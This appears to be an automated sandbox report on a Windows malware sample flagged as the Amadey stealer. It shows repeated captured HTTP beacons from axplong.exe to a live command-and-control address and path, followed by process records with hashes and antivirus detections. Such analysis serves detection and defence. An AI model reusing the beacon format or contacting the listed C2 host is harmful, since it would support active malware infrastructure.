                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:59.473507881 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          52192.168.2.455702185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:59.587268114 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:00.296009064 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:00.296989918 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:00.523525953 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          53192.168.2.455703185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:00.635102034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:01.370619059 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:01.374037027 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:01.602348089 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          54192.168.2.455704185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:01.712519884 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:02.426134109 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:02.426983118 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:02.784313917 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          55192.168.2.455705185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:02.901293039 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:03.600759029 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          56192.168.2.455706185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:03.611223936 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:04.307177067 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          57192.168.2.455707185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:04.420551062 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:05.139678955 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:05.153896093 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:05.382577896 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          58192.168.2.455708185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:05.496049881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:06.197098017 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          59192.168.2.455709185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:06.206257105 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:07.033999920 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          60192.168.2.455710185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:07.157963037 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:07.851278067 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:08.083271980 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          61192.168.2.455711185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:08.085304022 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:08.792346001 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          62192.168.2.455712185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:08.902327061 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:09.606389046 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:07:09.611402035 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:09.839040995 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          63192.168.2.455713185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:10.652206898 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:11.361682892 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          64192.168.2.455714185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:11.371324062 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:12.076751947 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          65192.168.2.455715185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:12.199443102 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:07:12.920315981 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          66192.168.2.455716185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:07:12.929547071 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:07:13.653835058 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:07:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:11:05:05
                          Start date:26/09/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x500000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1726972956.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1767879458.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:11:05:08
                          Start date:26/09/2024
                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                          Imagebase:0x2b0000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1755618042.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1795993129.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 53%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:11:05:08
                          Start date:26/09/2024
                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Imagebase:0x2b0000
